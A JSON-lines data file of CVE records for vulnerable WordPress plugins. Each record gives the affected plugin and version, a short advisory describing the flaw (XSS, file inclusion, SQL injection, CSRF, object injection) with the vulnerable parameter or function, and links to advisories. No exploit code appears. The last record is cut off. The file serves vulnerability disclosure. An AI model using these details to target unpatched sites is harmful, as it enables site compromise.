{"CVE_ID":"CVE-2024-3559","slug":"custom-field-suite","versionImpact":"2.6.7","description":"The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cfs[post_content]' parameter versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56d8af3b-6c00-49ed-872a-64f7bebb470b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56d8af3b-6c00-49ed-872a-64f7bebb470b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-field-suite\\\/trunk\\\/includes\\\/form.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-field-suite\\\/trunk\\\/includes\\\/form.php#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-field-suite\\\/trunk\\\/includes\\\/api.php#L282\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-field-suite\\\/trunk\\\/includes\\\/api.php#L282\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2385","slug":"addons-for-elementor","versionImpact":"8.3.7","description":"The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 8.3.7 via several of the plugin's widgets through the 'style' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aa3ec9b-80d5-4e31-8045-43c8d151cab8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aa3ec9b-80d5-4e31-8045-43c8d151cab8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.5\\\/includes\\\/helper-functions.php#L726\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.5\\\/includes\\\/helper-functions.php#L726\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.5\\\/includes\\\/widgets\\\/heading.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addons-for-elementor\\\/tags\\\/8.3.5\\\/includes\\\/widgets\\\/heading.php#L267\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6870","slug":"responsive-lightbox","versionImpact":"2.4.7","description":"The Responsive Lightbox & Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping affecting the rl_upload_image AJAX endpoint. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the 3gp2 file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4d55309-d178-4b3d-9de6-2cf2769b76fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4d55309-d178-4b3d-9de6-2cf2769b76fe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-lightbox\\\/tags\\\/2.4.7\\\/includes\\\/class-remote-library.php#L261\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/responsive-lightbox\\\/tags\\\/2.4.7\\\/includes\\\/class-remote-library.php#L261\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-lightbox\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/responsive-lightbox\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3137531%40responsive-lightbox&new=3137531%40responsive-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3137531%40responsive-lightbox&new=3137531%40responsive-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9068","slug":"oneelements-ultimate-addons-for-elementor","versionImpact":"1.3.7","description":"The OneElements \u2013 Best Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f83a514-2b42-4348-9525-438205daeeab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f83a514-2b42-4348-9525-438205daeeab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/oneelements-ultimate-addons-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/oneelements-ultimate-addons-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9376","slug":"kata-plus","versionImpact":"1.4.7","description":"The Kata Plus \u2013 Addons for Elementor \u2013 Widgets, Extensions and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05c7267e-2e0c-48e9-bdaa-c8bc0b9ec8a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05c7267e-2e0c-48e9-bdaa-c8bc0b9ec8a6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kata-plus\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kata-plus\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174359\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3174359\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/climaxthemes.com\\\/kata\\\/documentation\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/climaxthemes.com\\\/kata\\\/documentation\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12165","slug":"cf7-mollie","versionImpact":"5.0.0","description":"The Mollie for Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 5.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-mollie\\\/trunk\\\/includes\\\/php\\\/admin_menu.php#L164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-mollie\\\/trunk\\\/includes\\\/php\\\/admin_menu.php#L164\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5a21b3a-a60f-4083-a474-ec9fedd9b8cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5a21b3a-a60f-4083-a474-ec9fedd9b8cb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11906","slug":"tpg-get-posts","versionImpact":"3.6.5","description":"The TPG Get Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tpg_get_posts' shortcode in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tpg-get-posts\\\/trunk\\\/inc\\\/class-tpg-gp-process.php#L478\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tpg-get-posts\\\/trunk\\\/inc\\\/class-tpg-gp-process.php#L478\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tpg-get-posts\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tpg-get-posts\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c22288e6-76f3-4c5a-bd7b-30681334bab7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c22288e6-76f3-4c5a-bd7b-30681334bab7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-22336","slug":"wizhi-multi-filters","versionImpact":"1.8.6","description":"Cross-Site Request Forgery (CSRF) vulnerability in WordPress ?? Wizhi Multi Filters by Wenprise allows Stored XSS. This issue affects Wizhi Multi Filters by Wenprise: from n\/a through 1.8.6.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wizhi-multi-filters\\\/vulnerability\\\/wordpress-wizhi-multi-filters-by-wenprise-plugin-1-8-6-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wizhi-multi-filters\\\/vulnerability\\\/wordpress-wizhi-multi-filters-by-wenprise-plugin-1-8-6-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13340","slug":"wp-meta-data-filter-and-taxonomy-filter","versionImpact":"1.3.3.6","description":"The MDTF \u2013 Meta Data and Taxonomies Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mdf_results_by_ajax' shortcode in all versions up to, and including, 1.3.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224186%40wp-meta-data-filter-and-taxonomy-filter&new=3224186%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224186%40wp-meta-data-filter-and-taxonomy-filter&new=3224186%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226055%40wp-meta-data-filter-and-taxonomy-filter&new=3226055%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226055%40wp-meta-data-filter-and-taxonomy-filter&new=3226055%40wp-meta-data-filter-and-taxonomy-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-meta-data-filter-and-taxonomy-filter\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-meta-data-filter-and-taxonomy-filter\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcaeae5b-4047-4f09-8197-6ce2c21cc812?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fcaeae5b-4047-4f09-8197-6ce2c21cc812?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13492","slug":"guten-free-options","versionImpact":"0.9.5","description":"The Guten Free Options WordPress plugin through 0.9.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a4a75b75-4801-4ed4-bcc6-4874ac169562\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a4a75b75-4801-4ed4-bcc6-4874ac169562\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13844","slug":"post-smtp","versionImpact":"3.1.2","description":"The Post SMTP plugin for WordPress is vulnerable to generic SQL Injection via the \u2018columns\u2019 parameter in all versions up to, and including, 3.1.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/nhienit2010\\\/d4692062f54b89e16aa068a0ef142cf6#file-postmanemailquerylog-php-L314\",\"name\":\"https:\\\/\\\/gist.github.com\\\/nhienit2010\\\/d4692062f54b89e16aa068a0ef142cf6#file-postmanemailquerylog-php-L314\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249371\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249371\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-smtp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-smtp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0540f70d-009a-4776-8717-f096e30a11d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0540f70d-009a-4776-8717-f096e30a11d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2803","slug":"so-called-air-quotes","versionImpact":"0.1","description":"The So-Called Air Quotes plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/so-called-air-quotes\\\/trunk\\\/airquote.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/so-called-air-quotes\\\/trunk\\\/airquote.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/so-called-air-quotes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/so-called-air-quotes\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83f2ceee-4422-4ed5-adc7-91bc022ae42d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83f2ceee-4422-4ed5-adc7-91bc022ae42d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2105","slug":"jupiterx-core","versionImpact":"4.8.11","description":"The Jupiter X Core plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.8.11 via deserialization of untrusted input from the 'file' parameter of the 'raven_download_file' function. This makes it possible for attackers to inject a PHP Object through a PHAR file. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. This vulnerability may be exploited by unauthenticated attackers when a form is present on the site with the file download action, and the ability to upload files is also present. Otherwise, this would be considered exploitable by Contributor-level users and above, because they could create the form needed to successfully exploit this.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279676\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/utils.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279676\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/utils.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jupiterx-core\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jupiterx-core\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3427387e-30d2-40a5-9bfd-d458039d8e2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3427387e-30d2-40a5-9bfd-d458039d8e2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5019","slug":"hive-support","versionImpact":"1.2.2","description":"The Hive Support | AI-Powered Help Desk, Live Chat & AI Chat Bot Plugin for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing or incorrect nonce validation on the hs_update_ai_chat_settings() function. This makes it possible for unauthenticated attackers to reconfigure the plugin\u2019s AI\/chat settings (including API keys) and to potentially redirect notifications or leak data to attacker-controlled endpoints via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hive-support\\\/tags\\\/1.2.4\\\/backend\\\/class-hive-support-chat-ajax.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hive-support\\\/tags\\\/1.2.4\\\/backend\\\/class-hive-support-chat-ajax.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hive-support\\\/tags\\\/1.2.4\\\/backend\\\/class-hive-support-chat-ajax.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hive-support\\\/tags\\\/1.2.4\\\/backend\\\/class-hive-support-chat-ajax.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hive-support\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hive-support\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50542e5e-da66-4223-a6bf-dc9381687ddd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50542e5e-da66-4223-a6bf-dc9381687ddd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8314","slug":"software-issue-manager","versionImpact":"5.0.1","description":"The Software Issue Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018noaccess_msg\u2019 parameter in all versions up to, and including, 5.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/software-issue-manager\\\/tags\\\/5.0.0\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/software-issue-manager\\\/tags\\\/5.0.0\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341018\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341018\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/software-issue-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/software-issue-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ef87ab8-d56b-4d3a-b4fc-6c17c24143ec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ef87ab8-d56b-4d3a-b4fc-6c17c24143ec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4750","slug":"wp-responsive-testimonials-slider-and-widget","versionImpact":"1.5","description":"The WP Responsive Testimonials Slider And Widget WordPress plugin through 1.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7bdc1324-8d08-4185-971f-8d49367702cf\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7bdc1324-8d08-4185-971f-8d49367702cf\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4372","slug":"wc-dynamic-pricing-and-discounts","versionImpact":"2.4.1","description":"The WooCommerce Dynamic Pricing and Discounts plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.4.1. This is due to missing sanitization on the settings imported via the import() function. This makes it possible for unauthenticated attackers to import a settings file containing malicious JavaScript that would execute when an administrator accesses the settings area of the site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcaa5d0e-b764-4566-bd46-2d41dc391c36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcaa5d0e-b764-4566-bd46-2d41dc391c36?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/woocommerce-dynamic-pricing-and-discounts-plugin-fixed-multiple-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/woocommerce-dynamic-pricing-and-discounts-plugin-fixed-multiple-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1534","slug":"woocommerce-jetpack","versionImpact":"7.1.7","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 7.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56dc5138-c864-4e36-8b7d-38ac49589c06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/56dc5138-c864-4e36-8b7d-38ac49589c06?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3046146%40woocommerce-jetpack%2Ftrunk&old=3034358%40woocommerce-jetpack%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3046146%40woocommerce-jetpack%2Ftrunk&old=3034358%40woocommerce-jetpack%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0892","slug":"schema-app-structured-data-for-schemaorg","versionImpact":"2.2.0","description":"The Schema App Structured Data plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.0. This is due to missing or incorrect nonce validation on the MarkUpdate function. This makes it possible for unauthenticated attackers to update and delete post metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/254291b3-a30d-44ff-9df4-6ba700a9efc9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/254291b3-a30d-44ff-9df4-6ba700a9efc9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-app-structured-data-for-schemaorg\\\/trunk\\\/lib\\\/SchemaEditor.php#L327\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-app-structured-data-for-schemaorg\\\/trunk\\\/lib\\\/SchemaEditor.php#L327\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-38345","slug":"sola-testimonials","description":"A cross-site request forgery vulnerability exists in Sola Testimonials versions prior to 3.0.0. If this vulnerability is exploited, an attacker allows a user who logs in to the WordPress site where the affected plugin is enabled to access a malicious page. As a result, the user may perform unintended operations on the WordPress site.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sola-testimonials\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sola-testimonials\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN34977158\\\/\",\"name\":\"https:\\\/\\\/jvn.jp\\\/en\\\/jp\\\/JVN34977158\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9028","slug":"wp-gpx-maps","versionImpact":"1.7.08","description":"The WP GPX Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sgpx' shortcode in all versions up to, and including, 1.7.08 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 